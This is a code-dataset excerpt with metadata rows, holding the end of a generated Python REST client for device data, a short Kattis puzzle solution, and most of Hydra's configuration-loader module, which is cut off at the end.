collection_formats=collection_formats)
def read_memory_usage(self, body, **kwargs): # noqa: E501
"""Read out the memory usage of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_memory_usage(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadMemoryUsageRequest body: Request to process. (required)
:return: ReadMemoryUsageResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_memory_usage_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_memory_usage_with_http_info(body, **kwargs) # noqa: E501
return data
def read_memory_usage_with_http_info(self, body, **kwargs): # noqa: E501
"""Read out the memory usage of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_memory_usage_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadMemoryUsageRequest body: Request to process. (required)
:return: ReadMemoryUsageResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_memory_usage" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_memory_usage`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/memory-usage', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadMemoryUsageResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_sbc(self, body, **kwargs): # noqa: E501
"""Reads out SBC data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_sbc(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadSBCRequest body: Request to process. (required)
:return: ReadSBCResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_sbc_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_sbc_with_http_info(body, **kwargs) # noqa: E501
return data
def read_sbc_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out SBC data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_sbc_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadSBCRequest body: Request to process. (required)
:return: ReadSBCResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_sbc" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_sbc`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/sbc', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadSBCResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_server(self, body, **kwargs): # noqa: E501
"""Reads out server data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_server(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadServerRequest body: Request to process. (required)
:return: ReadServerResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_server_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_server_with_http_info(body, **kwargs) # noqa: E501
return data
def read_server_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out server data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_server_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadServerRequest body: Request to process. (required)
:return: ReadServerResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_server" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_server`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/server', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadServerResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_ups(self, body, **kwargs): # noqa: E501
"""Reads out UPS data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_ups(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadUPSRequest body: Request to process. (required)
:return: ReadUPSResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_ups_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_ups_with_http_info(body, **kwargs) # noqa: E501
return data
def read_ups_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out UPS data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_ups_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadUPSRequest body: Request to process. (required)
:return: ReadUPSResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_ups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_ups`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/ups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadUPSResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.247761
| 124
| 0.601384
|
4a11000033aba07060ea56b826afb5afeb7f35ef
| 1,136
|
py
|
Python
|
Problems/alphabetanimals.py
|
rikgj/Kattis
|
2e34dee307aef5acea5837732bf9f27f8c548e9c
|
[
"MIT"
] | null | null | null |
Problems/alphabetanimals.py
|
rikgj/Kattis
|
2e34dee307aef5acea5837732bf9f27f8c548e9c
|
[
"MIT"
] | null | null | null |
Problems/alphabetanimals.py
|
rikgj/Kattis
|
2e34dee307aef5acea5837732bf9f27f8c548e9c
|
[
"MIT"
] | null | null | null |
from sys import stdin
lastletter = stdin.readline().strip()[-1]
numOfAnimals = int(stdin.readline())
animals = [None] * numOfAnimals
animals = [x.strip() for x in stdin.readlines()]
lettercomb = []
# make dictionary
# st = 'abcdefghijklmnopqrstuvwxyz'
# animals_fl = {x: 0 for x in st}
animals_fl = {'a': 0, 'b': 0, 'c': 0, 'd': 0, 'e': 0, 'f': 0, 'g': 0, 'h': 0, 'i': 0, 'j': 0, 'k': 0, 'l': 0, 'm': 0, 'n': 0, 'o': 0, 'p': 0, 'q': 0, 'r': 0, 's': 0, 't': 0, 'u': 0, 'v': 0, 'w': 0, 'x': 0, 'y': 0, 'z': 0}
# keep track of how many occurance a first letter has
for a in animals:
animals_fl[a[0]]+=1
def chooseCan():
candidate = '?'
for animal in animals:
# a candidate with new potential
if animal[0] == lastletter and animal[-1] not in lettercomb:
# add last letter to checked
last = animal[-1]
lettercomb.append(last)
# check if best candidate
if animals_fl[last] == animal[0].count(last):
return (animal + '!')
elif candidate == '?':
candidate = animal
return candidate
print(chooseCan())
| 32.457143
| 221
| 0.542254
|
4a110009b5239dd53649d028d95fc19e972e4ca3
| 35,083
|
py
|
Python
|
hydra/_internal/config_loader_impl.py
|
Devabdulakeem/hydra
|
7afee0976f7507c3c1b607ebd129d3408b608fa2
|
[
"MIT"
] | null | null | null |
hydra/_internal/config_loader_impl.py
|
Devabdulakeem/hydra
|
7afee0976f7507c3c1b607ebd129d3408b608fa2
|
[
"MIT"
] | null | null | null |
hydra/_internal/config_loader_impl.py
|
Devabdulakeem/hydra
|
7afee0976f7507c3c1b607ebd129d3408b608fa2
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
Configuration loader
"""
import copy
import os
import re
import warnings
from collections import defaultdict
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple
from omegaconf import Container, DictConfig, ListConfig, OmegaConf, open_dict
from omegaconf.errors import (
ConfigAttributeError,
ConfigKeyError,
OmegaConfBaseException,
)
from hydra._internal.config_repository import ConfigRepository
from hydra.core.config_loader import ConfigLoader, LoadTrace
from hydra.core.config_search_path import ConfigSearchPath
from hydra.core.object_type import ObjectType
from hydra.core.override_parser.overrides_parser import OverridesParser
from hydra.core.override_parser.types import Override, OverrideType, ValueType
from hydra.core.utils import JobRuntime
from hydra.errors import ConfigCompositionException, MissingConfigException
from hydra.plugins.config_source import ConfigLoadError, ConfigSource
from hydra.types import RunMode
class UnspecifiedMandatoryDefault(Exception):
def __init__(self, config_group: str,) -> None:
self.config_group = config_group
@dataclass
class DefaultElement:
config_group: Optional[str]
config_name: str
optional: bool = False
package: Optional[str] = None
def __repr__(self) -> str:
ret = ""
if self.config_group is not None:
ret += self.config_group
if self.package is not None:
ret += f"@{self.package}"
ret += f"={self.config_name}"
if self.optional:
ret += " (optional)"
return ret
@dataclass
class IndexedDefaultElement:
idx: int
default: DefaultElement
def __repr__(self) -> str:
return f"#{self.idx} : {self.default}"
class ConfigLoaderImpl(ConfigLoader):
"""
Configuration loader
"""
def __init__(
self,
config_search_path: ConfigSearchPath,
default_strict: Optional[bool] = None,
) -> None:
self.default_strict = default_strict
self.all_config_checked: List[LoadTrace] = []
self.config_search_path = config_search_path
self.repository: ConfigRepository = ConfigRepository(
config_search_path=config_search_path
)
def split_by_override_type(
self, overrides: List[Override],
) -> Tuple[List[Override], List[Override]]:
config_group_overrides = []
config_overrides = []
for override in overrides:
if not self.repository.group_exists(override.key_or_group):
config_overrides.append(override)
else:
config_group_overrides.append(override)
return config_group_overrides, config_overrides
def missing_config_error(
self, config_name: Optional[str], msg: str, with_search_path: bool
) -> None:
def add_search_path() -> str:
descs = []
for src in self.repository.get_sources():
if src.provider != "schema":
descs.append(f"\t{repr(src)}")
lines = "\n".join(descs)
if with_search_path:
return msg + "\nSearch path:" + f"\n{lines}"
else:
return msg
raise MissingConfigException(
missing_cfg_file=config_name, message=add_search_path()
)
def ensure_main_config_source_available(self) -> None:
for source in self.get_sources():
# if specified, make sure main config search path exists
if source.provider == "main":
if not source.available():
if source.scheme() == "pkg":
if source.path == "":
msg = (
"Primary config module is empty."
"\nPython requires resources to be in a module with an __init__.py file"
)
else:
msg = (
f"Primary config module '{source.path}' not found."
f"\nCheck that it's correct and contains an __init__.py file"
)
else:
msg = (
f"Primary config directory not found."
f"\nCheck that the config directory '{source.path}' exists and readable"
)
self.missing_config_error(
config_name=None, msg=msg, with_search_path=False,
)
def load_configuration(
self,
config_name: Optional[str],
overrides: List[str],
run_mode: RunMode,
strict: Optional[bool] = None,
from_shell: bool = True,
) -> DictConfig:
try:
return self._load_configuration(
config_name=config_name,
overrides=overrides,
run_mode=run_mode,
strict=strict,
from_shell=from_shell,
)
except OmegaConfBaseException as e:
raise ConfigCompositionException() from e
def _load_configuration(
self,
config_name: Optional[str],
overrides: List[str],
run_mode: RunMode,
strict: Optional[bool] = None,
from_shell: bool = True,
) -> DictConfig:
if config_name is not None and not self.repository.config_exists(config_name):
self.missing_config_error(
config_name=config_name,
msg=f"Cannot find primary config : {config_name}, check that it's in your config search path",
with_search_path=True,
)
if strict is None:
strict = self.default_strict
parser = OverridesParser.create()
parsed_overrides = parser.parse_overrides(overrides=overrides)
config_overrides = []
sweep_overrides = []
for x in parsed_overrides:
if x.is_sweep_override():
if run_mode == RunMode.MULTIRUN:
if x.is_hydra_override():
raise ConfigCompositionException(
f"Sweeping over Hydra's configuration is not supported : '{x.input_line}'"
)
sweep_overrides.append(x)
elif run_mode == RunMode.RUN:
if x.value_type == ValueType.SIMPLE_CHOICE_SWEEP:
vals = "value1,value2"
if from_shell:
example_override = f"key=\\'{vals}\\'"
else:
example_override = f"key='{vals}'"
msg = f"""Ambiguous value for argument '{x.input_line}'
1. To use it as a list, use key=[value1,value2]
2. To use it as string, quote the value: {example_override}
3. To sweep over it, add --multirun to your command line"""
raise ConfigCompositionException(msg)
else:
raise ConfigCompositionException(
f"Sweep parameters '{x.input_line}' requires --multirun"
)
else:
assert False
else:
config_overrides.append(x)
config_group_overrides, config_overrides = self.split_by_override_type(
config_overrides
)
# Load hydra config
hydra_cfg, _load_trace = self._load_primary_config(cfg_filename="hydra_config")
# Load job config
job_cfg, job_cfg_load_trace = self._load_primary_config(
cfg_filename=config_name, record_load=False
)
job_defaults = self._parse_defaults(job_cfg)
defaults = self._parse_defaults(hydra_cfg)
job_cfg_type = OmegaConf.get_type(job_cfg)
if job_cfg_type is not None and not issubclass(job_cfg_type, dict):
hydra_cfg._promote(job_cfg_type)
# during the regular merge later the config will retain the readonly flag.
_recursive_unset_readonly(hydra_cfg)
# this is breaking encapsulation a bit. can potentially be implemented in OmegaConf
hydra_cfg._metadata.ref_type = job_cfg._metadata.ref_type
OmegaConf.set_readonly(hydra_cfg.hydra, False)
# if defaults are re-introduced by the promotion, remove it.
if "defaults" in hydra_cfg:
with open_dict(hydra_cfg):
del hydra_cfg["defaults"]
if config_name is not None:
defaults.append(DefaultElement(config_group=None, config_name="__SELF__"))
split_at = len(defaults)
self._combine_default_lists(defaults, job_defaults)
ConfigLoaderImpl._apply_overrides_to_defaults(config_group_overrides, defaults)
# Load and defaults and merge them into cfg
try:
cfg = self._merge_defaults_into_config(
hydra_cfg,
job_cfg,
job_cfg_load_trace,
defaults,
split_at,
run_mode=run_mode,
)
except UnspecifiedMandatoryDefault as e:
options = self.get_group_options(e.config_group)
opt_list = "\n".join(["\t" + x for x in options])
msg = (
f"You must specify '{e.config_group}', e.g, {e.config_group}=<OPTION>"
f"\nAvailable options:"
f"\n{opt_list}"
)
raise ConfigCompositionException(msg) from e
OmegaConf.set_struct(cfg.hydra, True)
OmegaConf.set_struct(cfg, strict)
# Apply command line overrides after enabling strict flag
ConfigLoaderImpl._apply_overrides_to_config(config_overrides, cfg)
app_overrides = []
for override in parsed_overrides:
if override.is_hydra_override():
cfg.hydra.overrides.hydra.append(override.input_line)
else:
cfg.hydra.overrides.task.append(override.input_line)
app_overrides.append(override)
with open_dict(cfg.hydra.job):
if "name" not in cfg.hydra.job:
cfg.hydra.job.name = JobRuntime().get("name")
cfg.hydra.job.override_dirname = get_overrides_dirname(
overrides=app_overrides,
kv_sep=cfg.hydra.job.config.override_dirname.kv_sep,
item_sep=cfg.hydra.job.config.override_dirname.item_sep,
exclude_keys=cfg.hydra.job.config.override_dirname.exclude_keys,
)
cfg.hydra.job.config_name = config_name
for key in cfg.hydra.job.env_copy:
cfg.hydra.job.env_set[key] = os.environ[key]
return cfg
def load_sweep_config(
self, master_config: DictConfig, sweep_overrides: List[str]
) -> DictConfig:
# Recreate the config for this sweep instance with the appropriate overrides
overrides = OmegaConf.to_container(master_config.hydra.overrides.hydra)
assert isinstance(overrides, list)
overrides = overrides + sweep_overrides
sweep_config = self.load_configuration(
config_name=master_config.hydra.job.config_name,
strict=self.default_strict,
overrides=overrides,
run_mode=RunMode.RUN,
)
with open_dict(sweep_config):
sweep_config.hydra.runtime.merge_with(master_config.hydra.runtime)
# Partial copy of master config cache, to ensure we get the same resolved values for timestamps
cache: Dict[str, Any] = defaultdict(dict, {})
cache_master_config = OmegaConf.get_cache(master_config)
for k in ["now"]:
if k in cache_master_config:
cache[k] = cache_master_config[k]
OmegaConf.set_cache(sweep_config, cache)
return sweep_config
def get_search_path(self) -> ConfigSearchPath:
return self.config_search_path
def get_load_history(self) -> List[LoadTrace]:
"""
returns the load history (which configs were attempted to load, and if they
were loaded successfully or not.
"""
return copy.deepcopy(self.all_config_checked)
@staticmethod
def is_matching(override: Override, default: DefaultElement) -> bool:
assert override.key_or_group == default.config_group
if override.is_delete():
return override.get_subject_package() == default.package
else:
return override.key_or_group == default.config_group and (
override.pkg1 == default.package
or override.pkg1 == ""
and default.package is None
)
@staticmethod
def find_matches(
key_to_defaults: Dict[str, List[IndexedDefaultElement]], override: Override,
) -> List[IndexedDefaultElement]:
matches: List[IndexedDefaultElement] = []
for default in key_to_defaults[override.key_or_group]:
if ConfigLoaderImpl.is_matching(override, default.default):
matches.append(default)
return matches
@staticmethod
def _apply_overrides_to_defaults(
overrides: List[Override], defaults: List[DefaultElement],
) -> None:
key_to_defaults: Dict[str, List[IndexedDefaultElement]] = defaultdict(list)
for idx, default in enumerate(defaults):
if default.config_group is not None:
key_to_defaults[default.config_group].append(
IndexedDefaultElement(idx=idx, default=default)
)
for override in overrides:
value = override.value()
if value is None:
if override.is_add():
ConfigLoaderImpl._raise_parse_override_error(override.input_line)
if not override.is_delete():
override.type = OverrideType.DEL
msg = (
"\nRemoving from the defaults list by assigning 'null' "
"is deprecated and will be removed in Hydra 1.1."
f"\nUse ~{override.key_or_group}"
)
warnings.warn(category=UserWarning, message=msg)
if (
not (override.is_delete() or override.is_package_rename())
and value is None
):
ConfigLoaderImpl._raise_parse_override_error(override.input_line)
if override.is_add() and override.is_package_rename():
raise ConfigCompositionException(
"Add syntax does not support package rename, remove + prefix"
)
matches = ConfigLoaderImpl.find_matches(key_to_defaults, override)
if isinstance(value, (list, dict)):
raise ConfigCompositionException(
f"Config group override value type cannot be a {type(value).__name__}"
)
if override.is_delete():
src = override.get_source_item()
if len(matches) == 0:
raise ConfigCompositionException(
f"Could not delete. No match for '{src}' in the defaults list."
)
for pair in matches:
if value is not None and value != defaults[pair.idx].config_name:
raise ConfigCompositionException(
f"Could not delete. No match for '{src}={value}' in the defaults list."
)
del defaults[pair.idx]
elif override.is_add():
if len(matches) > 0:
src = override.get_source_item()
raise ConfigCompositionException(
f"Could not add. An item matching '{src}' is already in the defaults list."
)
assert value is not None
defaults.append(
DefaultElement(
config_group=override.key_or_group,
config_name=str(value),
package=override.get_subject_package(),
)
)
else:
assert value is not None
# override
for match in matches:
default = match.default
default.config_name = str(value)
if override.is_package_rename():
default.package = override.get_subject_package()
if len(matches) == 0:
src = override.get_source_item()
if override.is_package_rename():
msg = f"Could not rename package. No match for '{src}' in the defaults list."
else:
msg = (
f"Could not override '{src}'. No match in the defaults list."
f"\nTo append to your default list use +{override.input_line}"
)
raise ConfigCompositionException(msg)
@staticmethod
def _split_group(group_with_package: str) -> Tuple[str, Optional[str]]:
idx = group_with_package.find("@")
if idx == -1:
# group
group = group_with_package
package = None
else:
# group@package
group = group_with_package[0:idx]
package = group_with_package[idx + 1 :]
return group, package
@staticmethod
def _apply_overrides_to_config(overrides: List[Override], cfg: DictConfig) -> None:
for override in overrides:
if override.get_subject_package() is not None:
raise ConfigCompositionException(
f"Override {override.input_line} looks like a config group override, "
f"but config group '{override.key_or_group}' does not exist."
)
key = override.key_or_group
value = override.value()
try:
if override.is_delete():
config_val = OmegaConf.select(cfg, key, throw_on_missing=False)
if config_val is None:
raise ConfigCompositionException(
f"Could not delete from config. '{override.key_or_group}' does not exist."
)
elif value is not None and value != config_val:
raise ConfigCompositionException(
f"Could not delete from config."
f" The value of '{override.key_or_group}' is {config_val} and not {value}."
)
last_dot = key.rfind(".")
with open_dict(cfg):
if last_dot == -1:
del cfg[key]
else:
node = OmegaConf.select(cfg, key[0:last_dot])
del node[key[last_dot + 1 :]]
elif override.is_add():
if OmegaConf.select(cfg, key, throw_on_missing=False) is None:
with open_dict(cfg):
OmegaConf.update(cfg, key, value)
else:
raise ConfigCompositionException(
f"Could not append to config. An item is already at '{override.key_or_group}'."
)
else:
try:
OmegaConf.update(cfg, key, value)
except (ConfigAttributeError, ConfigKeyError) as ex:
raise ConfigCompositionException(
f"Could not override '{override.key_or_group}'. No match in config."
f"\nTo append to your config use +{override.input_line}"
) from ex
except OmegaConfBaseException as ex:
raise ConfigCompositionException(
f"Error merging override {override.input_line}"
) from ex
@staticmethod
def _raise_parse_override_error(override: Optional[str]) -> None:
msg = (
f"Error parsing config group override : '{override}'"
f"\nAccepted forms:"
f"\n\tOverride: key=value, key@package=value, key@src_pkg:dest_pkg=value, key@src_pkg:dest_pkg"
f"\n\tAppend: +key=value, +key@package=value"
f"\n\tDelete: ~key, ~key@pkg, ~key=value, ~key@pkg=value"
f"\n"
f"\nSee https://hydra.cc/docs/next/advanced/override_grammar/basic for details"
)
raise ConfigCompositionException(msg)
def _record_loading(
self,
name: str,
path: Optional[str],
provider: Optional[str],
schema_provider: Optional[str],
record_load: bool,
) -> Optional[LoadTrace]:
trace = LoadTrace(
filename=name,
path=path,
provider=provider,
schema_provider=schema_provider,
)
if record_load:
self.all_config_checked.append(trace)
return trace
@staticmethod
def _combine_default_lists(
primary: List[DefaultElement], merged_list: List[DefaultElement]
) -> None:
key_to_idx = {}
for idx, d in enumerate(primary):
if d.config_group is not None:
key_to_idx[d.config_group] = idx
for d in copy.deepcopy(merged_list):
if d.config_group is not None:
if d.config_group in key_to_idx.keys():
idx = key_to_idx[d.config_group]
primary[idx] = d
merged_list.remove(d)
# append remaining items that were not matched to existing keys
for d in merged_list:
primary.append(d)
def _load_config_impl(
self,
input_file: str,
package_override: Optional[str],
is_primary_config: bool,
record_load: bool = True,
) -> Tuple[Optional[DictConfig], Optional[LoadTrace]]:
"""
:param input_file:
:param record_load:
:return: the loaded config or None if it was not found
"""
ret = self.repository.load_config(
config_path=input_file,
is_primary_config=is_primary_config,
package_override=package_override,
)
if ret is not None:
if not isinstance(ret.config, DictConfig):
raise ValueError(
f"Config {input_file} must be a Dictionary, got {type(ret).__name__}"
)
if not ret.is_schema_source:
try:
schema_source = self.repository.get_schema_source()
config_path = ConfigSource._normalize_file_name(filename=input_file)
schema = schema_source.load_config(
config_path,
is_primary_config=is_primary_config,
package_override=package_override,
)
try:
if is_primary_config:
# Add as placeholders for hydra and defaults to allow
# overriding them from the config even if not in schema
schema.config = OmegaConf.merge(
{"hydra": None, "defaults": []}, schema.config,
)
merged = OmegaConf.merge(schema.config, ret.config)
assert isinstance(merged, DictConfig)
# remove placeholders if unused
with open_dict(merged):
if "hydra" in merged and merged.hydra is None:
del merged["hydra"]
if "defaults" in merged and merged["defaults"] == []:
del merged["defaults"]
except OmegaConfBaseException as e:
raise ConfigCompositionException(
f"Error merging '{input_file}' with schema"
) from e
assert isinstance(merged, DictConfig)
return (
merged,
self._record_loading(
name=input_file,
path=ret.path,
provider=ret.provider,
schema_provider=schema.provider,
record_load=record_load,
),
)
except ConfigLoadError:
# schema not found, ignore
pass
return (
ret.config,
self._record_loading(
name=input_file,
path=ret.path,
provider=ret.provider,
schema_provider=None,
record_load=record_load,
),
)
else:
return (
None,
self._record_loading(
name=input_file,
path=None,
provider=None,
schema_provider=None,
record_load=record_load,
),
)
def list_groups(self, parent_name: str) -> List[str]:
return self.get_group_options(
group_name=parent_name, results_filter=ObjectType.GROUP
)
def get_group_options(
self, group_name: str, results_filter: Optional[ObjectType] = ObjectType.CONFIG
) -> List[str]:
return self.repository.get_group_options(group_name, results_filter)
def _merge_config(
self,
cfg: DictConfig,
config_group: str,
name: str,
required: bool,
is_primary_config: bool,
package_override: Optional[str],
) -> DictConfig:
try:
if config_group != "":
new_cfg = f"{config_group}/{name}"
else:
new_cfg = name
loaded_cfg, _ = self._load_config_impl(
new_cfg,
is_primary_config=is_primary_config,
package_override=package_override,
)
if loaded_cfg is None:
if required:
if config_group == "":
msg = f"Could not load {new_cfg}"
raise MissingConfigException(msg, new_cfg)
else:
options = self.get_group_options(config_group)
if options:
opt_list = "\n".join(["\t" + x for x in options])
msg = (
f"Could not load {new_cfg}.\nAvailable options:"
f"\n{opt_list}"
)
else:
msg = f"Could not load {new_cfg}"
raise MissingConfigException(msg, new_cfg, options)
else:
return cfg
else:
ret = OmegaConf.merge(cfg, loaded_cfg)
assert isinstance(ret, DictConfig)
return ret
except OmegaConfBaseException as ex:
raise ConfigCompositionException(
f"Error merging {config_group}={name}"
) from ex
def _merge_defaults_into_config(
self,
hydra_cfg: DictConfig,
job_cfg: DictConfig,
job_cfg_load_trace: Optional[LoadTrace],
defaults: List[DefaultElement],
split_at: int,
run_mode: RunMode,
) -> DictConfig:
def merge_defaults_list_into_config(
merged_cfg: DictConfig, def_list: List[DefaultElement]
) -> DictConfig:
# Reconstruct the defaults to make use of the interpolation capabilities of OmegaConf.
dict_with_list = OmegaConf.create({"defaults": []})
for item in def_list:
d: Any
if item.config_group is not None:
d = {item.config_group: item.config_name}
else:
d = item.config_name
dict_with_list.defaults.append(d)
for idx, default1 in enumerate(def_list):
if default1.config_group is not None:
if OmegaConf.is_missing(
dict_with_list.defaults[idx], default1.config_group
):
if run_mode == RunMode.RUN:
raise UnspecifiedMandatoryDefault(
config_group=default1.config_group
)
else:
config_name = "???"
else:
config_name = dict_with_list.defaults[idx][
default1.config_group
]
else:
config_name = dict_with_list.defaults[idx]
if config_name == "__SELF__":
if "defaults" in job_cfg:
with open_dict(job_cfg):
del job_cfg["defaults"]
merged_cfg.merge_with(job_cfg)
if job_cfg_load_trace is not None:
self.all_config_checked.append(job_cfg_load_trace)
elif default1.config_group is not None:
if default1.config_name not in (None, "_SKIP_", "???"):
merged_cfg = self._merge_config(
cfg=merged_cfg,
config_group=default1.config_group,
name=config_name,
required=not default1.optional,
is_primary_config=False,
package_override=default1.package,
)
else:
if default1.config_name != "_SKIP_":
merged_cfg = self._merge_config(
cfg=merged_cfg,
config_group="",
name=config_name,
required=True,
is_primary_config=False,
package_override=default1.package,
)
return merged_cfg
system_list: List[DefaultElement] = []
user_list: List[DefaultElement] = []
for default in defaults:
if len(system_list) < split_at:
system_list.append(default)
else:
user_list.append(default)
hydra_cfg = merge_defaults_list_into_config(hydra_cfg, system_list)
hydra_cfg = merge_defaults_list_into_config(hydra_cfg, user_list)
if "defaults" in hydra_cfg:
del hydra_cfg["defaults"]
return hydra_cfg
def _load_primary_config(
self, cfg_filename: Optional[str], record_load: bool = True
) -> Tuple[DictConfig, Optional[LoadTrace]]:
if cfg_filename is None:
cfg = OmegaConf.create()
assert isinstance(cfg, DictConfig)
load_trace = None
else:
ret, load_trace = self._load_config_impl(
cfg_filename,
is_primary_config=True,
package_override=None,
record_load=record_load,
)
assert ret is not None
cfg = ret
